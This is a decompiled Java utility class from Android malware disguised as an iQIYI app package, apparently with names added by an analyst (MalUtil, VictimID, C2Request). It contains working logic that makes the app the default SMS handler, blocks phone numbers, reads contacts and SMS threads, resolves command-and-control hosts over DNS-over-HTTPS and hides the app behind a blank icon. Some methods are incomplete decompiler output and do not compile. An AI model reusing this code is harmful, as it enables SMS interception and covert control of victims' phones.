package com.iqiyi.i18n;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.pm.PackageManager;
import android.content.res.Resources;
import android.database.Cursor;
import android.graphics.Bitmap;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.net.Uri;
import android.os.Build;
import android.provider.BlockedNumberContract;
import android.provider.ContactsContract;
import android.provider.Telephony;
import java.net.InetAddress;
import java.text.SimpleDateFormat;
import java.util.Date;
import org.json.JSONArray;
import org.json.JSONObject;
import p000a.p019g.p020d.C0122a;
import p000a.p019g.p020d.p021c.C0134f;
import p072c.p073a.p074a.C0497a;

/* renamed from: com.iqiyi.i18n.n */
public class MalUtil {

    /* renamed from: a */
    private static long lastAttemptTS = 0;

    /* renamed from: b */
    private static int attemptThreshold = 3000;

    /* renamed from: a */
    public static boolean smsManagerReplaced(Context context) {
        String defaultSmsPackage = Telephony.Sms.getDefaultSmsPackage(context);
        return defaultSmsPackage != null && defaultSmsPackage.equals(context.getPackageName());
    }

    /* renamed from: b */
    public static void blockNumber(Context context, String str) {
        ContentValues contentValues = new ContentValues();
        contentValues.put("original_number", str);
        context.getContentResolver().insert(BlockedNumberContract.BlockedNumbers.CONTENT_URI, contentValues);
    }

    /* renamed from: c */
    public static void makeNotificationChannel(Context context) {
        if (Build.VERSION.SDK_INT >= 26) {
            String b = VictimID.getOrMake(context);
            String b2 = VictimID.getOrMake(context);
            NotificationChannel notificationChannel = new NotificationChannel(VictimID.getOrMake(context), b, 3);
            notificationChannel.setDescription(b2);
            ((NotificationManager) context.getSystemService(NotificationManager.class)).createNotificationChannel(notificationChannel);
        }
    }

    /* renamed from: d */
    public static String checkDomainWithDOH(String str) {
        "cloudflare-dns.com";
        "/dns-query?name=%s&type=A";
        try {
            C2Request gVar = new C2Request();
            gVar.setHost("cloudflare-dns.com");
            gVar.usePOST(false);
            gVar.setPath(String.format("/dns-query?name=%s&type=A", new Object[]{str}));
            gVar.useHTTPS(true);
            gVar.setPort(443);
            gVar.setHeaders(new String[][]{new String[]{"Accept", "application/dns-json"}});
            if (!gVar.doC2HTTPRequest()) {
                return null;
            }
            JSONArray jSONArray = new JSONObject(gVar.getResponse()).getJSONArray("Answer");
            return jSONArray.getJSONObject(Util.rng.nextInt(jSONArray.length() - 1)).getString("data");
        } catch (Exception e) {
            return null;
        }
    }

    /* renamed from: e */
    public static String formatDate(long j) {
        return new SimpleDateFormat("dd/MM/yyyy " + "HH:mm:ss").format(new Date(j));
    }

    /* renamed from: f */
    public static String getAppLabel(Context context, String str) {
        try {
            PackageManager packageManager = context.getPackageManager();
            return (String) packageManager.getApplicationLabel(packageManager.getApplicationInfo(str, 128));
        } catch (Exception e) {
            return null;
        }
    }

    /* renamed from: g */
    public static String getContactByName(Context context, String str) {
        Cursor query = context.getContentResolver().query(Uri.withAppendedPath(ContactsContract.PhoneLookup.CONTENT_FILTER_URI, Uri.encode(str)), new String[]{"display_name"}, (String) null, (String[]) null, (String) null);
        if (query != null) {
            if (query.getCount() == 0) {
                query.close();
            } else {
                if (query.moveToFirst()) {
                    str = query.getString(query.getColumnIndex("display_name"));
                }
                query.close();
            }
        }
        return str;
    }

    /* renamed from: h */
    public static String sharedGetOriginalSMSManager(Context context) {
        return context.getSharedPreferences(context.getString(2131689500), 0).getString("b", (String) null);
    }

    /* JADX WARNING: Removed duplicated region for block: B:15:0x005f  */
    /* renamed from: i */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    public static int getSMSConvThreadIdByNumber(android.content.Context r10, java.lang.String r11) {
        /*
            r7 = 0
            r0 = -63280222165799(0xffffc6726cd624d9, double:NaN)
            java.lang.String r0 = p072c.p073a.p074a."content://sms/"
            android.net.Uri r1 = android.net.Uri.parse(r0)
            r6 = -1
            android.content.ContentResolver r0 = r10.getContentResolver()     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            r2 = -63344646675239(0xffffc6636cd624d9, double:NaN)
            java.lang.String r3 = p072c.p073a.p074a."address= ?"     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            r2 = 1
            java.lang.String[] r4 = new java.lang.String[r2]     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            r2 = 0
            r4[r2] = r11     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            r8 = -63391891315495(0xffffc6586cd624d9, double:NaN)
            java.lang.String r5 = p072c.p073a.p074a."date asc"     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            r2 = 0
            android.database.Cursor r1 = r0.query(r1, r2, r3, r4, r5)     // Catch:{ Exception -> 0x0063, all -> 0x005b }
            int r0 = r1.getCount()     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            if (r0 <= 0) goto L_0x0054
            r1.moveToNext()     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            r2 = -63430546021159(0xffffc64f6cd624d9, double:NaN)
            java.lang.String r0 = p072c.p073a.p074a."thread_id"     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            int r0 = r1.getColumnIndex(r0)     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            java.lang.String r0 = r1.getString(r0)     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            int r0 = java.lang.Integer.parseInt(r0)     // Catch:{ Exception -> 0x006c, all -> 0x006e }
            if (r1 == 0) goto L_0x0053
            r1.close()
        L_0x0053:
            return r0
        L_0x0054:
            if (r1 == 0) goto L_0x0059
            r1.close()
        L_0x0059:
            r0 = r6
            goto L_0x0053
        L_0x005b:
            r0 = move-exception
            r1 = r7
        L_0x005d:
            if (r1 == 0) goto L_0x0062
            r1.close()
        L_0x0062:
            throw r0
        L_0x0063:
            r0 = move-exception
            r1 = r7
        L_0x0065:
            if (r1 == 0) goto L_0x006a
            r1.close()
        L_0x006a:
            r0 = r6
            goto L_0x0053
        L_0x006c:
            r0 = move-exception
            goto L_0x0065
        L_0x006e:
            r0 = move-exception
            goto L_0x005d
        */
        throw new UnsupportedOperationException("Method not decompiled: com.iqiyi.i18n.MalUtil.getSMSConvThreadIdByNumber(android.content.Context, java.lang.String):int");
    }

    /* renamed from: j */
    public static boolean hasAllThesePermissions(Context context, String... strArr) {
        if (!(context == null || strArr == null)) {
            for (String a : strArr) {
                if (C0122a.hasPermission(context, a) != 0) {
                    return false;
                }
            }
        }
        return true;
    }

    /* JADX WARNING: Code restructure failed: missing block: B:18:0x0044, code lost:
        if (r0 != null) goto L_0x0046;
     */
    /* JADX WARNING: Code restructure failed: missing block: B:19:0x0046, code lost:
        r0.close();
     */
    /* JADX WARNING: Code restructure failed: missing block: B:28:0x0056, code lost:
        if (r0 != null) goto L_0x0046;
     */
    /* JADX WARNING: Code restructure failed: missing block: B:36:?, code lost:
        return r6;
     */
    /* JADX WARNING: Removed duplicated region for block: B:24:0x0050  */
    /* renamed from: k */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    public static java.lang.Boolean isNumberInContacts(android.content.Context r8, java.lang.String r9) {
        /*
            r7 = 0
            java.lang.Boolean r6 = java.lang.Boolean.FALSE
            android.content.ContentResolver r0 = r8.getContentResolver()     // Catch:{ Exception -> 0x0054, all -> 0x004b }
            android.net.Uri r1 = android.provider.ContactsContract.CommonDataKinds.Phone.CONTENT_URI     // Catch:{ Exception -> 0x0054, all -> 0x004b }
            r2 = 0
            r3 = 0
            r4 = 0
            r5 = 0
            android.database.Cursor r0 = r0.query(r1, r2, r3, r4, r5)     // Catch:{ Exception -> 0x0054, all -> 0x004b }
            int r1 = r0.getCount()     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            if (r1 != 0) goto L_0x001e
            if (r0 == 0) goto L_0x001c
            r0.close()
        L_0x001c:
            r0 = r6
        L_0x001d:
            return r0
        L_0x001e:
            boolean r1 = r0.moveToNext()     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            if (r1 == 0) goto L_0x0044
            r2 = -63164258048807(0xffffc68d6cd624d9, double:NaN)
            java.lang.String r1 = p072c.p073a.p074a."data1"     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            int r1 = r0.getColumnIndex(r1)     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            java.lang.String r1 = r0.getString(r1)     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            boolean r1 = android.telephony.PhoneNumberUtils.compare(r9, r1)     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            if (r1 == 0) goto L_0x001e
            java.lang.Boolean r1 = java.lang.Boolean.TRUE     // Catch:{ Exception -> 0x0059, all -> 0x005b }
            if (r0 == 0) goto L_0x0042
            r0.close()
        L_0x0042:
            r0 = r1
            goto L_0x001d
        L_0x0044:
            if (r0 == 0) goto L_0x0049
        L_0x0046:
            r0.close()
        L_0x0049:
            r0 = r6
            goto L_0x001d
        L_0x004b:
            r0 = move-exception
            r1 = r0
            r2 = r7
        L_0x004e:
            if (r2 == 0) goto L_0x0053
            r2.close()
        L_0x0053:
            throw r1
        L_0x0054:
            r0 = move-exception
            r0 = r7
        L_0x0056:
            if (r0 == 0) goto L_0x0049
            goto L_0x0046
        L_0x0059:
            r1 = move-exception
            goto L_0x0056
        L_0x005b:
            r1 = move-exception
            r2 = r0
            goto L_0x004e
        */
        throw new UnsupportedOperationException("Method not decompiled: com.iqiyi.i18n.MalUtil.isNumberInContacts(android.content.Context, java.lang.String):java.lang.Boolean");
    }

    /* renamed from: l */
    public static boolean isConnectedToTheInternet(Context context) {
        NetworkInfo activeNetworkInfo = ((ConnectivityManager) context.getSystemService("connectivity")).getActiveNetworkInfo();
        return activeNetworkInfo != null && activeNetworkInfo.isConnected();
    }

    /* renamed from: m */
    public static String resolveHostname(String str) {
        try {
            return InetAddress.getByName(str).getHostAddress();
        } catch (Exception e) {
            return null;
        }
    }

    /* renamed from: n */
    public static void setTransparentIcon(Activity activity, String str) {
        try {
            Bitmap createBitmap = Bitmap.createBitmap(40, 40, Bitmap.Config.ARGB_8888);
            createBitmap.eraseColor(-1);
            activity.setTaskDescription(new ActivityManager.TaskDescription(str, createBitmap, C0134f.m724a(activity.getResources(), 2131034171, (Resources.Theme) null)));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /* renamed from: o */
    public static void sleepSec(int i) {
        try {
            Thread.sleep((long) (i * 1000));
        } catch (Exception e) {
        }
    }

    /* renamed from: p */
    public static void setSmsManager(Context context) {
        if (lastAttemptTS == 0 || System.currentTimeMillis() - lastAttemptTS >= ((long) attemptThreshold)) {
            lastAttemptTS = System.currentTimeMillis();
            String defaultSmsPackage = Telephony.Sms.getDefaultSmsPackage(context);
            if (defaultSmsPackage != null) {
                SharedPreferences sharedPreferences = context.getSharedPreferences(context.getString(2131689500), 0);
                SharedPreferences.Editor edit = sharedPreferences.edit();
                if (sharedPreferences.getString("b", (String) null) == null) {
                    edit.putString("b", defaultSmsPackage);
                }
                edit.commit();
                Intent intent = new Intent(context, IntentStarter.class);
                intent.setFlags(805306368);
                intent.putExtra("a", 1);
                context.startActivity(intent);
            }
        }
    }
}
